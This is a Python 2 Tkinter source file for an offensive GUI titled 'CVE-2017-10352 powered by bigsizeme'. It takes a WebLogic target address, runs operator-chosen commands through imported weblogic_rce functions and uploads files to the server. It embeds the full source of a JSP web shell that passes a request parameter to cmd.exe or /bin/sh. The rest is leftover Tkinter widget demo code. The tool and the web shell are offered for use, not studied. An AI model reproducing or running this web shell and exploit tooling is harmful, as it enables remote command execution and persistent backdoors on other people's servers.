# -*- coding: UTF-8 -*-
import Tkinter as tk
import ttk

from Tkinter import Menu
from Tkinter import Spinbox
import tkMessageBox as mBox
import weblogic as wl
import weblogicwin as wlw

#由于tkinter中没有ToolTip功能，所以自定义这个功能如下
class ToolTip(object):
    def __init__(self, widget):
        self.widget = widget
        self.tipwindow = None
        self.id = None
        self.x = self.y = 0

    def showtip(self, text):
        "Display text in tooltip window"
        self.text = text
        if self.tipwindow or not self.text:
            return
        x, y, _cx, cy = self.widget.bbox("insert")
        x = x + self.widget.winfo_rootx() + 27
        y = y + cy + self.widget.winfo_rooty() +27
        self.tipwindow = tw = tk.Toplevel(self.widget)
        tw.wm_overrideredirect(1)
        tw.wm_geometry("+%d+%d" % (x, y))

        label = tk.Label(tw, text=self.text, justify=tk.LEFT,
                      background="#ffffe0", relief=tk.SOLID, borderwidth=1,
                      font=("tahoma", "8", "normal"))
        label.pack(ipadx=1)

    def hidetip(self):
        tw = self.tipwindow
        self.tipwindow = None
        if tw:
            tw.destroy()

exeploit ='''<%@ page import="java.io.*" %>
<%@ page import="java.lang.System" %>
<%@ page import="java.lang.Process" %>
<%@page import="java.io.BufferedReader"%>
<%@page import="java.io.InputStreamReader"%>
<%@page language="java" import="java.util.*" pageEncoding="UTF-8"%>
<%!
String Execute(String cmd){
	StringBuffer sb=new StringBuffer("");
	try{
		Process child;
		if(System.getProperty("os.name").toLowerCase().startsWith("win")){  
			child = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",cmd});  
		}else{
			child = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c",cmd});  
		}
		BufferedReader br = new BufferedReader(new InputStreamReader(child.getInputStream()));  
        String line;  
        while ((line = br.readLine()) != null) {  '''

exeploit+="sb.append(line).append(\"\\n\");\n"\
	 " }\n"
exeploit+= ''' try {
			child.waitFor();
		} catch (InterruptedException e) {
			e.printStackTrace();
		}
	} catch (IOException e) {
		System.err.println(e);  
	}	
	return sb.toString();
}
%>
<%
String cmd = request.getParameter("c");
//do execute cmd
if(cmd != null){
	out.print(Execute(cmd));	
}'''


caidao = '''call me maybe'''
#===================================================================

def cmd(target,cmd,output_file='xxx.jsp',os='linux', shell_file='exec.jsp'):
    if os == 'linux':
        wl.proxies =None
        return wl.weblogic_rce(target,cmd,output_file,'linux')
    else:
        print 'win'
        wlw.proxies = None
        return wlw.weblogic_rce(target, cmd,output_file, shell_file)


def createToolTip( widget, text):
    toolTip = ToolTip(widget)
    def enter(event):
        toolTip.showtip(text)
    def leave(event):
        toolTip.hidetip()
    widget.bind('<Enter>', enter)
    widget.bind('<Leave>', leave)

# Create instance
win = tk.Tk()

# Add a title
win.title("CVE-2017-10352 powered by bigsizeme")

# Disable resizing the GUI
win.resizable(0,0)

urlFrame = ttk.Frame(win)

urlFrame.pack(expand=1, fill='both')



urlLabel = ttk.Label(urlFrame, width=4, text='地 址: ')
#urlLabel.pack(side='left', padx=30.0, anchor='e')
urlLabel.grid(row=0, column=0, padx=30)
urlString = tk.StringVar()
urlString.set('192.168.144.24:7001')
urlEntry = ttk.Entry(urlFrame, width=20, textvariable=urlString, text='192.168.144.24:7001')
#urlEntry.pack(side='left', padx=10.0, anchor='e')
urlEntry.grid(row=0, column=1)


#urlButton = ttk.Button(urlFrame, width=4, text='执 行', command=main)
#urlButton.grid(row=0, column=2, padx=5)
# Tab Control introduced here --------------------------------------
tabControl = ttk.Notebook(win)          # Create Tab Control

tabCmd = ttk.Frame(tabControl)
tabControl.add(tabCmd, text='命令执行')      # Add the tab

tabUpload = ttk.Frame(tabControl)  #文件上次页签
tabControl.add(tabUpload,text='文件上传')


tab1 = ttk.Frame(tabControl)            # Create a tab
#tabControl.add(tab1, text='第一页 ')      # Add the tab

tab2 = ttk.Frame(tabControl)            # Add a second tab
#tabControl.add(tab2, text='第二页 ')      # Make second tab visible

tab3 = ttk.Frame(tabControl)            # Add a third tab
#tabControl.add(tab3, text='第三页 ')      # Make second tab visible

tabControl.pack(expand=1, fill="both")  # Pack to make visible
# ~ Tab Control introduced here -----------------------------------------e

cmdDisplay = ttk.LabelFrame(tabCmd, text='命令回显区')
cmdDisplay.grid(column=0, row=0, padx=8, pady=4)

#ttk.Label(cmdDisplay, text="输入文字:").grid(column=0, row=0, sticky='W')
cmdLabel = ttk.Label(cmdDisplay, text="CMD:", width=5)
cmdLabel.grid(column=0, row=0, sticky='W')


cmdString = tk.StringVar()
cmdEntry = ttk.Entry(cmdDisplay, width=10, text='whoami', textvariable=cmdString)
#urlEntry.pack(side='left', padx=10.0, anchor='e')
cmdEntry.grid(row=0, column=1, sticky='W', padx=15)

#调用命令执行函数
aa = ('','')


#
text = tk.Text(cmdDisplay, width=45, height=10)
text.grid(column=0, row=1, sticky='W', columnspan=7)
# text.insert(tk.INSERT, 'I Love\n')

def execCmd():
    target = urlString.get()
    print target
    comm = cmdString.get()
    print comm

    status, result = cmd(target,comm,os='win')


    if not status:    # linux  情况下在区执行一次命
        status, result = cmd(target,comm)
    text.delete(0.0,tk.END)
    text.insert(tk.INSERT, result)


cmdButton = ttk.Button(cmdDisplay, text='执行', width=5, command=execCmd)
cmdButton.grid(row=0, column=2, sticky='W')


#--------------文件上传-----------------------#
#creating a container uploadt tab  hold  fileName (Entity,Text,Button,Label)

uploadDisplay = ttk.LabelFrame(tabUpload, text='文件上传')
uploadDisplay.grid(column=0, row=0, padx=8, pady=4)

#ttk.Label(cmdDisplay, text="输入文字:").grid(column=0, row=0, sticky='W')
fileLabel = ttk.Label(uploadDisplay, text="文件名称: ", width=6)
fileLabel.grid(column=0, row=0, sticky='W')


fileString = tk.StringVar()
fileEntry = ttk.Entry(uploadDisplay, width=20, textvariable=fileString, text='axtx.jsp')
#urlEntry.pack(side='left', padx=10.0, anchor='e')
fileEntry.grid(row=0, column=1, sticky='W', padx=15)


fileText = tk.Text(uploadDisplay, width=45, height=10)
fileText.grid(column=0, row=1, sticky='W', columnspan=7)
fileText.insert(tk.INSERT,caidao)

def upload():

    target = urlString.get()
    print target
    fileName = fileString.get()
    print fileName
    shell = fileText.get(tk.INSERT,tk.END)
    print shell
    wlw.proxies = None
    wlw.weblogic_rce2(target,fileName,caidao)


fileButton = ttk.Button(uploadDisplay, text='执行', width=5, command=upload)
fileButton.grid(row=0, column=2, sticky='W')



#---------------Tab1控件介绍------------------#
# We are creating a container tab3 to hold all other widgets
monty = ttk.LabelFrame(tab1, text='控件示范区1')
monty.grid(column=0, row=0, padx=8, pady=4)



# Modified Button Click Function
def clickMe():
    action.configure(text='Hello\n ' + name.get())
    action.configure(state='disabled')    # Disable the Button Widget

# Changing our Label
ttk.Label(monty, text="输入文字:").grid(column=0, row=0, sticky='W')

# Adding a Textbox Entry widget
name = tk.StringVar()
nameEntered = ttk.Entry(monty, width=12, textvariable=name)
nameEntered.grid(column=0, row=1, sticky='W')

# Adding a Button
action = ttk.Button(monty, text="点击之后\n按钮失效", width=10, command=clickMe)
action.grid(column=2,row=1,rowspan=2,ipady=7)

ttk.Label(monty, text="请选择一本书:").grid(column=1, row=0, sticky='W')

# Adding a Combobox
book = tk.StringVar()
bookChosen = ttk.Combobox(monty, width=12, textvariable=book)
bookChosen['values'] = ('平凡的世界', '亲爱的安德烈','看见','白夜行')
bookChosen.grid(column=1, row=1)
bookChosen.current(0)  #设置初始显示值，值为元组['values']的下标
bookChosen.config(state='readonly')  #设为只读模式

# Spinbox callback
def _spin():
    value = spin.get()
    #print(value)
    #scr.insert(tk.INSERT, value + '\n')

def _spin2():
    value = spin2.get()
    #print(value)
    #scr.insert(tk.INSERT, value + '\n')

# Adding 2 Spinbox widget using a set of values
spin = Spinbox(monty, from_=10,to=25, width=5, bd=8, command=_spin)
spin.grid(column=0, row=2)

spin2 = Spinbox(monty, values=('Python3入门', 'C语言','C++', 'Java', 'OpenCV'), width=13, bd=3, command=_spin2)
spin2.grid(column=1, row=2,sticky='W')

# Using a scrolled Text control
#scrolW  = 30; scrolH  =  5
#scr = scrolledtext.ScrolledText(monty, width=scrolW, height=scrolH, wrap=tk.WORD)
#scr.grid(column=0, row=3, sticky='WE', columnspan=3)

# Add Tooltip
createToolTip(spin,       '这是一个Spinbox.')
createToolTip(spin2,      '这是一个Spinbox.')
createToolTip(action,     '这是一个Button.')
createToolTip(nameEntered,'这是一个Entry.')
createToolTip(bookChosen, '这是一个Combobox.')
#createToolTip(scr,        '这是一个ScrolledText.')

# 一次性控制各控件之间的距离
for child in monty.winfo_children():
    child.grid_configure(padx=3,pady=1)
# 单独控制个别控件之间的距离
action.grid(column=2,row=1,rowspan=2,padx=6)
#---------------Tab1控件介绍------------------#


#---------------Tab2控件介绍------------------#
# We are creating a container tab3 to hold all other widgets -- Tab2
monty2 = ttk.LabelFrame(tab2, text='控件示范区2')
monty2.grid(column=0, row=0, padx=8, pady=4)
# Creating three checkbuttons
chVarDis = tk.IntVar()
check1 = tk.Checkbutton(monty2, text="失效选项", variable=chVarDis, state='disabled')
check1.select()
check1.grid(column=0, row=0, sticky=tk.W)

chVarUn = tk.IntVar()
check2 = tk.Checkbutton(monty2, text="遵从内心", variable=chVarUn)
check2.deselect()   #Clears (turns off) the checkbutton.
check2.grid(column=1, row=0, sticky=tk.W )

chVarEn = tk.IntVar()
check3 = tk.Checkbutton(monty2, text="屈于现实", variable=chVarEn)
check3.deselect()
check3.grid(column=2, row=0, sticky=tk.W)

# GUI Callback function
def checkCallback(*ignoredArgs):
    # only enable one checkbutton
    if chVarUn.get(): check3.configure(state='disabled')
    else:             check3.configure(state='normal')
    if chVarEn.get(): check2.configure(state='disabled')
    else:             check2.configure(state='normal')

# trace the state of the two checkbuttons  #？？
chVarUn.trace('w', lambda unused0, unused1, unused2 : checkCallback())
chVarEn.trace('w', lambda unused0, unused1, unused2 : checkCallback())

# Radiobutton list
values = ["富强民主", "文明和谐", "自由平等","公正法治","爱国敬业","诚信友善"]

# Radiobutton callback function
def radCall():
    radSel=radVar.get()
    if   radSel == 0: monty2.configure(text='富强民主')
    elif radSel == 1: monty2.configure(text='文明和谐')
    elif radSel == 2: monty2.configure(text='自由平等')
    elif radSel == 3: monty2.configure(text='公正法治')
    elif radSel == 4: monty2.configure(text='爱国敬业')
    elif radSel == 5: monty2.configure(text='诚信友善')

# create three Radiobuttons using one variable
radVar = tk.IntVar()

# Selecting a non-existing index value for radVar
radVar.set(99)

# Creating all three Radiobutton widgets within one loop
for col in range(4):
    #curRad = 'rad' + str(col)
    curRad = tk.Radiobutton(monty2, text=values[col], variable=radVar, value=col, command=radCall)
    curRad.grid(column=col, row=6, sticky=tk.W, columnspan=3)
for col in range(4,6):
    #curRad = 'rad' + str(col)
    curRad = tk.Radiobutton(monty2, text=values[col], variable=radVar, value=col, command=radCall)
    curRad.grid(column=col-4, row=7, sticky=tk.W, columnspan=3)

style = ttk.Style()
style.configure("BW.TLabel", font=("Times", "10",'bold'))
ttk.Label(monty2, text="   社会主义核心价值观", style="BW.TLabel").grid(column=2, row=7, columnspan=2, sticky=tk.EW)

# Create a container to hold labels
labelsFrame = ttk.LabelFrame(monty2, text=' 嵌套区域 ')
labelsFrame.grid(column=0, row=8,columnspan=4)

# Place labels into the container element - vertically
ttk.Label(labelsFrame, text="你才25岁，你可以成为任何你想成为的人。").grid(column=0, row=0)
ttk.Label(labelsFrame, text="不要在乎一城一池的得失，要执着。").grid(column=0, row=1, sticky=tk.W)

# Add some space around each label
for child in labelsFrame.winfo_children():
    child.grid_configure(padx=8,pady=4)
#---------------Tab2控件介绍------------------#


#---------------Tab3控件介绍------------------#
tab3 = tk.Frame(tab3, bg='#AFEEEE')
tab3.pack()
for i in range(2):
    canvas = 'canvas' + str(col)
    canvas = tk.Canvas(tab3, width=162, height=95, highlightthickness=0, bg='#FFFF00')
    canvas.grid(row=i, column=i)
#---------------Tab3控件介绍------------------#


#----------------菜单栏介绍-------------------#
# Exit GUI cleanly
def _quit():
    win.quit()
    win.destroy()
    exit()

# Creating a Menu Bar
menuBar = Menu(win)
win.config(menu=menuBar)

# Add menu items
fileMenu = Menu(menuBar, tearoff=0)
fileMenu.add_command(label="新建")
fileMenu.add_separator()
fileMenu.add_command(label="退出", command=_quit)
menuBar.add_cascade(label="文件", menu=fileMenu)


# Display a Message Box
def _msgBox1():
    mBox.showinfo('Python Message Info Box', '通知：程序运行正常！')
def _msgBox2():
    mBox.showwarning('Python Message Warning Box', '警告：程序出现错误，请检查！')
def _msgBox3():
    mBox.showwarning('Python Message Error Box', '错误：程序出现严重错误，请退出！')
def _msgBox4():
    answer = mBox.askyesno("Python Message Dual Choice Box", "你喜欢这篇文章吗？\n您的选择是：")
    if answer == True:
        mBox.showinfo('显示选择结果', '您选择了“是”，谢谢参与！')
    else:
        mBox.showinfo('显示选择结果', '您选择了“否”，谢谢参与！')

# Add another Menu to the Menu Bar and an item
msgMenu = Menu(menuBar, tearoff=0)
msgMenu.add_command(label="通知 Box", command=_msgBox1)
msgMenu.add_command(label="警告 Box", command=_msgBox2)
msgMenu.add_command(label="错误 Box", command=_msgBox3)
msgMenu.add_separator()
msgMenu.add_command(label="判断对话框", command=_msgBox4)
menuBar.add_cascade(label="消息框", menu=msgMenu)
#----------------菜单栏介绍-------------------#


# Change the main windows icon
#win.iconbitmap(r'C:\Users\feng\Desktop\研.ico')

# Place cursor into name Entry
nameEntered.focus()
#======================
# Start GUI
#======================
win.mainloop()